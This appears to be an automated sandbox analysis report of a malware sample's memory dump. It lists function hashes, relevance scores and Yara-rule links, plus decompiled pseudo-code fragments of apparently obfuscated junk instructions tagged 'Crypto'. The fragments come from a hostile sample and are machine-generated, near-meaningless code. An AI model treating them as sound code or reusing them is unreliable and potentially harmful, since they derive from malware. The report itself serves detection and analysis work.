Opcode ID: 2d3680a67b6717e4b25c6134f265aa037182101c33b63384ea1c5557e82863ac
Instruction ID: d1ea76f93faaf5be41aa595592cfb5cd86c13a73b44871590bea025b9f03be41
Opcode Fuzzy Hash: 2d3680a67b6717e4b25c6134f265aa037182101c33b63384ea1c5557e82863ac
Instruction Fuzzy Hash: 62623882E2E705D4F6932021C2507665551DF57382E328B7B9C2BB19E53B3F4A8B29CE

Uniqueness

Uniqueness Score: -1.00%

Function 00404B4D, Relevance: 1.2, Instructions: 1179COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.802381402.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.802370323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.802396539.0000000000415000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.802403909.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d128e84ae4c76f172c603c2284ef3e9be4a617bed96695a6b1d71a8117baf6a0
Instruction ID: 7981350ba5c30295ff6eaaab00761d9c0e60f3bffc671f2a30fd3c3cce818d2e
Opcode Fuzzy Hash: d128e84ae4c76f172c603c2284ef3e9be4a617bed96695a6b1d71a8117baf6a0
Instruction Fuzzy Hash: 17625942E2E705D4F6932020C2507665551DF67382E31CB7B9C2BB19E53B3F4A8B29DE

Uniqueness

Uniqueness Score: -1.00%

Function 00404BFE, Relevance: 1.2, Instructions: 1158COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.802381402.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.802370323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.802396539.0000000000415000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.802403909.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 96bbc46d86ac0c5c2860d5c7f55694ee445ea2533439a29f9ef5a8c10dbe7656
Instruction ID: c55559add91cceaa4caec81896c8f80e4e5dc38449356d29ade3a84d62a09831
Opcode Fuzzy Hash: 96bbc46d86ac0c5c2860d5c7f55694ee445ea2533439a29f9ef5a8c10dbe7656
Instruction Fuzzy Hash: CD624742E2E705D4F6932021C2507665555DF63382E32CB7B9C2BB15E53B3F4A8B29CE

Uniqueness

Uniqueness Score: -1.00%

Function 0040513D, Relevance: 1.0, Instructions: 1012COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.802381402.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.802370323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.802396539.0000000000415000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.802403909.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3ad1c47f5e3a87c5408a558dcbb2cbfedc32fa454a8d202b45b441446e340af0
Instruction ID: 50e9b45021be00f7b4f428fdb853941fba596e98dee1227738a0b2abe14ab374
Opcode Fuzzy Hash: 3ad1c47f5e3a87c5408a558dcbb2cbfedc32fa454a8d202b45b441446e340af0
Instruction Fuzzy Hash: C2424942E2E701D8F6932021C2507665555DF63382E32CB7B9C27B15E53B3F4A8B29DE

Uniqueness

Uniqueness Score: -1.00%

Function 004052AB, Relevance: 1.0, Instructions: 982COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.802381402.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.802370323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.802396539.0000000000415000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.802403909.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 04e2da2448fb0c4f15ea6de096fc4b1e0d9694ec5622442170734c1393facf86
Instruction ID: 9974ba59d253dbe31ff748f4401b1e337b64bb4499232c648a951c19721ebeb8
Opcode Fuzzy Hash: 04e2da2448fb0c4f15ea6de096fc4b1e0d9694ec5622442170734c1393facf86
Instruction Fuzzy Hash: 05424742E2E701C8F6932021C2507665655DF63382E32CB7B9C27B15E57B3F4A9B29CE

Uniqueness

Uniqueness Score: -1.00%

Function 0040525A, Relevance: 1.0, Instructions: 978COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.802381402.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.802370323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.802396539.0000000000415000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.802403909.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3883cd29298b43f89df2ae7dd8dcd652b187addabb5dda69fc3753fe7e97207f
Instruction ID: a1024a18c70fc0d30f3c000e22a2d203864e06ba0e87ee715e57e6c58e055665
Opcode Fuzzy Hash: 3883cd29298b43f89df2ae7dd8dcd652b187addabb5dda69fc3753fe7e97207f
Instruction Fuzzy Hash: 5B423742E2E701C8F6932021C2507665655DF63382E328B7B9C27B15E53B3F4A9B29DE

Uniqueness

Uniqueness Score: -1.00%

Function 0040522C, Relevance: 1.0, Instructions: 975COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.802381402.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.802370323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.802396539.0000000000415000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.802403909.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 66a8e19fba36e10bb9efbfc5173c83d05e068bdd6bcbc63ddc782448258ea9e9
Instruction ID: 4e57708b408eefbd9a5cdcef0a2fffda63734cff7989b81ae95095daa8c005f3
Opcode Fuzzy Hash: 66a8e19fba36e10bb9efbfc5173c83d05e068bdd6bcbc63ddc782448258ea9e9
Instruction Fuzzy Hash: 61424842E2E701C8F6932021C2507665555DF63382E32CB7B9C2BB15E53B3F4A9B29DE

Uniqueness

Uniqueness Score: -1.00%

Function 00405337, Relevance: 1.0, Instructions: 958COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.802381402.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.802370323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.802396539.0000000000415000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.802403909.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c15ac70158ab76d52e1e1ca3ffc23244a5b85fe2947f52c02208d9ad2705199e
Instruction ID: b640f6c0042f781018db701130c8eb7e77705840c36b5565ab702c7de1bed774
Opcode Fuzzy Hash: c15ac70158ab76d52e1e1ca3ffc23244a5b85fe2947f52c02208d9ad2705199e
Instruction Fuzzy Hash: 1D424842E2E701C8F6932021C2507665555DF63382E32CB7B9C2BB15E53B3F4A9B29DE

Uniqueness

Uniqueness Score: -1.00%

Function 0040539A, Relevance: 1.0, Instructions: 953
COMMONCrypto

Download Yara Rule

C-Code - Quality: 19%

			E0040539A(void* __eax, void* __ebx, void* __ecx, signed int __edx, void* __edi, void* __esi, void* __fp0) {
				void* _t21;
				void* _t24;
				signed int _t29;

				_t24 = __edi;
				_t21 = __ecx;
				asm("aam 0x1b");
				asm("aaa");
				cs =  *((intOrPtr*)(__esi - 0x71717172));
				cs =  *((intOrPtr*)(__esi - 0x71717172));
				cs =  *((intOrPtr*)(__esi - 0x71717172));
				cs =  *((intOrPtr*)(__esi - 0x71717172));
				cs =  *((intOrPtr*)(__esi - 0x71717172));
				ss =  *((intOrPtr*)(__ebx - 0x27f01d24));
				asm("fsubr st2, st0");
				asm("psubusb mm0, mm1");
				asm("punpcklbw xmm2, xmm2");
				asm("pcmpgtd xmm3, xmm0");
				asm("paddw mm7, mm6");
				asm("fst st6");
				asm("fldln2");
				asm("packssdw mm4, mm5");
				asm("fldln2");
				asm("fdivp st5, st0");
				_t29 = __edx & 0x000000ba;
				asm("wait");
				asm("fclex");
				asm("fdivrp st2, st0");
				asm("fsin");
				asm("psrlw mm3, 0x10");
				while(1) {
					_t21 = _t21 - 0x1d80;
					asm("punpcklwd xmm7, xmm2");
					asm("fabs");
					asm("paddsb mm1, mm7");
					asm("pcmpeqw mm1, mm7");
					if (_t29 != 0) goto L5;
					asm("iretd");
				}
			}

0x0040539a
0x0040539a
0x0040539b
0x0040539d
0x0040539e
0x004053a4
0x004053aa
0x004053b0
0x004053b6
0x004053bc
0x004053be
0x004053c0
0x004053c3
0x004053f0
0x004053f4
0x004053f7
0x00405419
0x0040541b
0x0040541e
0x00405420
0x00405440
0x00405446
0x00405447
0x00405449
0x0040544b
0x0040544d
0x00405477
0x00405477
0x0040547d
0x00405481
0x00405483
0x004054a3
0x004054a4
0x004054a5
0x004054a5

Memory Dump Source

Source File: 00000001.00000002.802381402.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.802370323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.802396539.0000000000415000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.802403909.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: edccc4544b7c1e6ef06d3ac388924238da969e6bede6ae182d0bb0dda260bab9
Instruction ID: 9ed6e98e925ebfbf63fb52f874189e5d5c837144e22f5af48074f4a5ae954012
Opcode Fuzzy Hash: edccc4544b7c1e6ef06d3ac388924238da969e6bede6ae182d0bb0dda260bab9
Instruction Fuzzy Hash: 4E425942E2E701C8F6932021C2507665651DF63382E32CB7B9C27B15E53B3F4A9B29DE

Uniqueness

Uniqueness Score: -1.00%

Function 0040536C, Relevance: .9, Instructions: 947COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.802381402.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.802370323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.802396539.0000000000415000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.802403909.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9a831873547ba6763c92e69b8868afb219e89f75e838377e2b1e390b8474abc5
Instruction ID: ac821f94289a001d8294f2408f8ad8e7090ed063b666b3b38dfb69f913cfa845
Opcode Fuzzy Hash: 9a831873547ba6763c92e69b8868afb219e89f75e838377e2b1e390b8474abc5
Instruction Fuzzy Hash: 5F424842E2E701C8F6932021C2507665555DF63382E32CB7B9C2BB15E53B3F4A9B29DE

Uniqueness

Uniqueness Score: -1.00%

Function 0040530B, Relevance: .9, Instructions: 941COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.802381402.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.802370323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.802396539.0000000000415000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.802403909.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4d44cb5a0ed440fede182d3694018e29437a424a1020fc3dd9e6e01869006b47
Instruction ID: 404dc9354514434a147d3970fa26a539b326be3663b789ccfd5b48948cb25830
Opcode Fuzzy Hash: 4d44cb5a0ed440fede182d3694018e29437a424a1020fc3dd9e6e01869006b47
Instruction Fuzzy Hash: BA424842E2E701C8F6932021C2507665555DF63382E32CB7B9C2BB15E53B3F4A9B29DE

Uniqueness

Uniqueness Score: -1.00%

Function 0040550A, Relevance: .9, Instructions: 926COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.802381402.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.802370323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.802396539.0000000000415000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.802403909.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 54fa0276057220883182c2d7c47d545b7db38da6b4b17ae4499785375cdc108e
Instruction ID: 704454ef95fcc371ee7d8a0b2583fbaa9d008646ed4ed2fbcab9a8bd429dbd82
Opcode Fuzzy Hash: 54fa0276057220883182c2d7c47d545b7db38da6b4b17ae4499785375cdc108e
Instruction Fuzzy Hash: 4E425842E2E701D8F6932021C1507665655DF63382E32CB7B9C2BB15E53B3F4A9B29CE

Uniqueness

Uniqueness Score: -1.00%

Function 00405454, Relevance: .9, Instructions: 925
COMMONCrypto

Download Yara Rule

C-Code - Quality: 37%

			E00405454(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __fp0) {
				void* _t9;
				void* _t41;
				void* _t45;

				_t9 = __ecx;
				_t41 = __edi + 0x1d;
				goto L1;
				_t9 = _t9 - 0x1d80;
				asm("punpcklwd xmm7, xmm2");
				asm("fabs");
				asm("paddsb mm1, mm7");
				asm("pcmpeqw mm1, mm7");
				if (_t45 != 0) goto L1;
				asm("iretd");
			}

0x00405454
0x00405474
0x00405474
0x00405477
0x0040547d
0x00405481
0x00405483
0x004054a3
0x004054a4
0x004054a5

Memory Dump Source

Source File: 00000001.00000002.802381402.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.802370323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.802396539.0000000000415000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.802403909.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4adbb583c0bdf330321d3a539e1496ee5ce30c1cc7d22e7ae856f3026998961e
Instruction ID: d5f3093504fdbb6afd04c3f82ff0ac5773132a82b38f3deb32ed6b8212e0ada9
Opcode Fuzzy Hash: 4adbb583c0bdf330321d3a539e1496ee5ce30c1cc7d22e7ae856f3026998961e
Instruction Fuzzy Hash: 36325842E2E701C8F6932021C2507665555DF63382E32CB7B9C2BB15E53B3F4A9B29DE

Uniqueness

Uniqueness Score: -1.00%

Function 004053FB, Relevance: .9, Instructions: 919
COMMONCrypto

Download Yara Rule

C-Code - Quality: 16%

			E004053FB(void* __ebx, void* __ecx, signed int __edx, void* __edi, void* __fp0) {
				void* _t23;
				void* _t26;
				signed int _t32;

				_t26 = __edi;
				_t23 = __ecx;
				 *(__ebx - 0x4f4f4fc3) =  *(__ebx - 0x4f4f4fc3) | 0x000000b0;
				asm("fldln2");
				asm("packssdw mm4, mm5");
				asm("fldln2");
				asm("fdivp st5, st0");
				_t32 = __edx & 0x000000ba;
				asm("wait");
				asm("fclex");
				asm("fdivrp st2, st0");
				asm("fsin");
				asm("psrlw mm3, 0x10");
				while(1) {
					_t23 = _t23 - 0x1d80;
					asm("punpcklwd xmm7, xmm2");
					asm("fabs");
					asm("paddsb mm1, mm7");
					asm("pcmpeqw mm1, mm7");
					if (_t32 != 0) goto L3;
					asm("iretd");
				}
			}

0x004053fb
0x004053fb
0x004053fc
0x00405419
0x0040541b
0x0040541e
0x00405420
0x00405440
0x00405446
0x00405447
0x00405449
0x0040544b
0x0040544d
0x00405477
0x00405477
0x0040547d
0x00405481
0x00405483
0x004054a3
0x004054a4
0x004054a5
0x004054a5

Memory Dump Source

Source File: 00000001.00000002.802381402.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.802370323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.802396539.0000000000415000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.802403909.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ab4de25dc5edbe5439e2310b00e09954610b02aa97d44968613020d00cd947ad
Instruction ID: 6c53e6f43ebcb6080ecab0f486b887008b663ce40971c72b19eff3b9d3b5699a
Opcode Fuzzy Hash: ab4de25dc5edbe5439e2310b00e09954610b02aa97d44968613020d00cd947ad
Instruction Fuzzy Hash: 0D325942E2E701C8F6932021C2507665555DF63382E32CB7B9C2BB15E53B3F4A5B29DE

Uniqueness

Uniqueness Score: -1.00%

Function 00405429, Relevance: .9, Instructions: 904
COMMONCrypto

Download Yara Rule

C-Code - Quality: 16%

			E00405429(void* __ebx, void* __ecx, void* __edi, void* __fp0) {
				void* _t11;
				void* _t18;

				_t18 = __edi;
				_t11 = __ecx;
				asm("wait");
				asm("fclex");
				asm("fdivrp st2, st0");
				asm("fsin");
				asm("psrlw mm3, 0x10");
				while(1) {
					_t11 = _t11 - 0x1d80;
					asm("punpcklwd xmm7, xmm2");
					asm("fabs");
					asm("paddsb mm1, mm7");
					asm("pcmpeqw mm1, mm7");
					if (0xba != 0) goto L2;
					asm("iretd");
				}
			}

0x00405429
0x00405429
0x00405446
0x00405447
0x00405449
0x0040544b
0x0040544d
0x00405477
0x00405477
0x0040547d
0x00405481
0x00405483
0x004054a3
0x004054a4
0x004054a5
0x004054a5

Memory Dump Source

Source File: 00000001.00000002.802381402.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.802370323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.802396539.0000000000415000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.802403909.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f932894b95893f6d057c44e48405719a626b7a4ca15e69d3ef6e6263847cfaf3
Instruction ID: 2dfa7adbca3de9294debc053307a2e417c3f1715b524300053cfe6b9d7c6f41a
Opcode Fuzzy Hash: f932894b95893f6d057c44e48405719a626b7a4ca15e69d3ef6e6263847cfaf3
Instruction Fuzzy Hash: 6C326842E2E701C8F6932021C2507665555DF63382E32CB7B9C2BB15E57B3F4A9B29CE

Uniqueness

Uniqueness Score: -1.00%

Function 00405488, Relevance: .9, Instructions: 901
COMMONCrypto

Download Yara Rule

C-Code - Quality: 50%

			E00405488(void* __eax, void* __ebx, void* __edx, void* __edi, void* __fp0) {
				void* _t29;
				void* _t32;

				_t29 = __edi;
				while(1) {
					asm("pcmpeqw mm1, mm7");
					if (_t32 != 0) goto L1;
					asm("iretd");
				}
			}

0x00405488
0x004054a2
0x004054a3
0x004054a4
0x004054a5
0x004054a5

Memory Dump Source

Source File: 00000001.00000002.802381402.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.802370323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.802396539.0000000000415000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.802403909.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b97cb60eed03c1a3e117d3d4d85c63358567d1c2fc2393a8028e9f816a4f58e2
Instruction ID: 152f59978f2b679e325b24166cd28d8a67bbe8ae4b2e9d7fbcff5275ab763828
Opcode Fuzzy Hash: b97cb60eed03c1a3e117d3d4d85c63358567d1c2fc2393a8028e9f816a4f58e2
Instruction Fuzzy Hash: 88326942E2E701C8F6932021C2507665555DF63382E32CB7B9C2BB15E53B3F4A5B29CE

Uniqueness

Uniqueness Score: -1.00%

Function 004054E0, Relevance: .9, Instructions: 899COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.802381402.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.802370323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.802396539.0000000000415000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.802403909.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b66dc317067358f55c95d230cfb33f6f1648808317c8c5136a7bbc2e3e351aea
Instruction ID: f429ae49f053728909e7c59497b7d149855485261f3324dfa2101158613552fc
Opcode Fuzzy Hash: b66dc317067358f55c95d230cfb33f6f1648808317c8c5136a7bbc2e3e351aea
Instruction Fuzzy Hash: 3E325842E2E701C8F6932020C2507665655DF67382E32CB7B9C2BB15E53B3F4A5B29DE

Uniqueness

Uniqueness Score: -1.00%

Function 004054B7, Relevance: .9, Instructions: 897
COMMONCrypto

Download Yara Rule

C-Code - Quality: 79%

			E004054B7(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __eflags, void* __fp0) {
				void* _t9;
				void* _t12;
				void* _t14;

				_t14 = __eflags;
				_t12 = __edi;
				_t9 = __ecx;
				while(1) {
					if (_t14 != 0) goto L1;
					asm("iretd");
				}
			}

0x004054b7
0x004054b7
0x004054b7
0x004054a4
0x004054a4
0x004054a5
0x004054a5

Memory Dump Source

Source File: 00000001.00000002.802381402.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.802370323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.802396539.0000000000415000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.802403909.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a6e0be3f8985578730e7c75a49d3488b468805d7af0a205e04a489d25c57fe94
Instruction ID: 64666238e180a7bd667051a97ef8f671f2cc40cc3f4e890b2bae175a51b79fab
Opcode Fuzzy Hash: a6e0be3f8985578730e7c75a49d3488b468805d7af0a205e04a489d25c57fe94
Instruction Fuzzy Hash: C9325842E2E701C8F6932021C2507665555DF63382E32CB7B9C2BB15E53B3F4A9B29DE

Uniqueness

Uniqueness Score: -1.00%

Function 004054C1, Relevance: .9, Instructions: 894
COMMONCrypto

Download Yara Rule

C-Code - Quality: 46%

			E004054C1(void* __eax, void* __ebx, void* __edx, void* __edi, void* __eflags, void* __fp0) {
				void* _t20;
				void* _t24;

				_t24 = __eflags;
				_t20 = __edi;
				_push(0xffffffeb);
				while(1) {
					asm("pcmpeqw mm1, mm7");
					if (_t24 != 0) goto L1;
					asm("iretd");
				}
			}

0x004054c1
0x004054c1
0x004054af
0x004054a2
0x004054a3
0x004054a4
0x004054a5
0x004054a5

Memory Dump Source

Source File: 00000001.00000002.802381402.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.802370323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.802396539.0000000000415000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.802403909.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: acb3a1cdbb959d791764a248bb6c497f96334c568e6622b3caecde0bcf357ba8
Instruction ID: 2f894c483cf7184c832058eea61d5e3fc5090768f3566f5c0ae92232330bf309
Opcode Fuzzy Hash: acb3a1cdbb959d791764a248bb6c497f96334c568e6622b3caecde0bcf357ba8
Instruction Fuzzy Hash: 76325842E2E701C8F6932021C2507665555DF63382E32CB7B9C2BB15E53B3F4A9B29DE

Uniqueness

Uniqueness Score: -1.00%

Function 004054AC, Relevance: .9, Instructions: 894
COMMONCrypto

Download Yara Rule

C-Code - Quality: 58%

			E004054AC(void* __eax, void* __ebx, void* __edx, void* __edi, void* __fp0) {
				void* _t20;
				void* _t23;

				_t20 = __edi;
				_t1 = __eax;
				__eax = __esp;
				__esp = _t1;
				_push(0xffffffeb);
				while(1) {
					asm("pcmpeqw mm1, mm7");
					if (_t23 != 0) goto L1;
					asm("iretd");
				}
			}

0x004054ac
0x004054ae
0x004054ae
0x004054ae
0x004054af
0x004054a2
0x004054a3
0x004054a4
0x004054a5
0x004054a5

Memory Dump Source

Source File: 00000001.00000002.802381402.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.802370323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.802396539.0000000000415000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.802403909.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e086b7929aca44b2de64165e9144897e976ccc7a6d2cce2718dc654027350f1b
Instruction ID: 21fc4c3e432c709c93a011a844e8c6149724dba8437d6189d922f18ee634fe37
Opcode Fuzzy Hash: e086b7929aca44b2de64165e9144897e976ccc7a6d2cce2718dc654027350f1b
Instruction Fuzzy Hash: 13325842E2E701C8F6932021C2507665555DF63382E32CB7B9C2BB15E53B3F4A9B29DE

Uniqueness

Uniqueness Score: -1.00%

Function 004054C3, Relevance: .9, Instructions: 892
COMMONCrypto

Download Yara Rule

C-Code - Quality: 58%

			E004054C3(void* __ebx, void* __edx, void* __edi, void* __eflags, void* __fp0) {
				void* _t17;
				void* _t19;

				_t19 = __eflags;
				_t17 = __edi;
				while(1) {
					asm("pcmpeqw mm1, mm7");
					if (_t19 != 0) goto L1;
					asm("iretd");
				}
			}

0x004054c3
0x004054c3
0x004054a2
0x004054a3
0x004054a4
0x004054a5
0x004054a5

Memory Dump Source

Source File: 00000001.00000002.802381402.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.802370323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.802396539.0000000000415000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.802403909.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7e6aa1f007f157bd3ba5f6fc361e8c9cd347407477998754e5111e0fcb0ff405
Instruction ID: 525b5dbb43fa2b68126f1dc29111ff53a1bfe3f7ec8df5c27f0e75becf3ce868
Opcode Fuzzy Hash: 7e6aa1f007f157bd3ba5f6fc361e8c9cd347407477998754e5111e0fcb0ff405
Instruction Fuzzy Hash: 4F325842E2E701C8F6932021C2507665555DF63382E32CB7B9C2BB15E53B3F4A9B29DE

Uniqueness

Uniqueness Score: -1.00%

Function 004054C5, Relevance: .9, Instructions: 891
COMMONCrypto

Download Yara Rule

C-Code - Quality: 58%

			E004054C5(void* __ebx, void* __edx, void* __edi, void* __eflags, void* __fp0) {
				void* _t14;
				void* _t16;

				_t16 = __eflags;
				_t14 = __edi;
				while(1) {
					asm("pcmpeqw mm1, mm7");
					if (_t16 != 0) goto L1;
					asm("iretd");
				}
			}

0x004054c5
0x004054c5
0x004054a2
0x004054a3
0x004054a4
0x004054a5
0x004054a5

Memory Dump Source

Source File: 00000001.00000002.802381402.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.802370323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.802396539.0000000000415000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.802403909.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6ad869a8d8c72b66a5f126cde746e3eccffb0fa1aed7e5ef706d036f5e524a02
Instruction ID: 8742e71e0f4364e4bd6ec0e96e394e7b49d739a708e5640f60ac18095941ac9e
Opcode Fuzzy Hash: 6ad869a8d8c72b66a5f126cde746e3eccffb0fa1aed7e5ef706d036f5e524a02
Instruction Fuzzy Hash: 61325842E2E701C8F6932021C2507665555DF63382E32CB7B9C2BB15E53B3F4A9B29DE

Uniqueness

Uniqueness Score: -1.00%

Function 004054C7, Relevance: .9, Instructions: 890
COMMONCrypto

Download Yara Rule

C-Code - Quality: 58%

			E004054C7(void* __ebx, void* __edx, void* __edi, void* __eflags, void* __fp0) {
				void* _t14;
				void* _t16;

				_t16 = __eflags;
				_t14 = __edi;
				while(1) {
					asm("pcmpeqw mm1, mm7");
					if (_t16 != 0) goto L1;
					asm("iretd");
				}
			}

0x004054c7
0x004054c7
0x004054a2
0x004054a3
0x004054a4
0x004054a5
0x004054a5

Memory Dump Source

Source File: 00000001.00000002.802381402.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.802370323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.802396539.0000000000415000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.802403909.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 23fe3466bfbdce92531d23117fa1fb2d5cd6c89a99e18d3d060bbaf905c4fe79
Instruction ID: a107c23bf49663d04db1772ef6f7c9889c7c02c8b80841546118f45d6f8a625f
Opcode Fuzzy Hash: 23fe3466bfbdce92531d23117fa1fb2d5cd6c89a99e18d3d060bbaf905c4fe79
Instruction Fuzzy Hash: BE325842E2E701C8F6932021C2507665555DF63382E32CB7B9C2BB15E53B3F4A9B29DE

Uniqueness

Uniqueness Score: -1.00%

Function 004054B3, Relevance: .9, Instructions: 890
COMMONCrypto

Download Yara Rule

C-Code - Quality: 58%

			E004054B3(void* __ebx, void* __edx, void* __edi, void* __eflags, void* __fp0) {
				void* _t14;
				void* _t16;

				_t16 = __eflags;
				_t14 = __edi;
				while(1) {
					asm("pcmpeqw mm1, mm7");
					if (_t16 != 0) goto L1;
					asm("iretd");
				}
			}

0x004054b3
0x004054b3
0x004054a2
0x004054a3
0x004054a4
0x004054a5
0x004054a5

Memory Dump Source

Source File: 00000001.00000002.802381402.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.802370323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.802396539.0000000000415000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.802403909.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
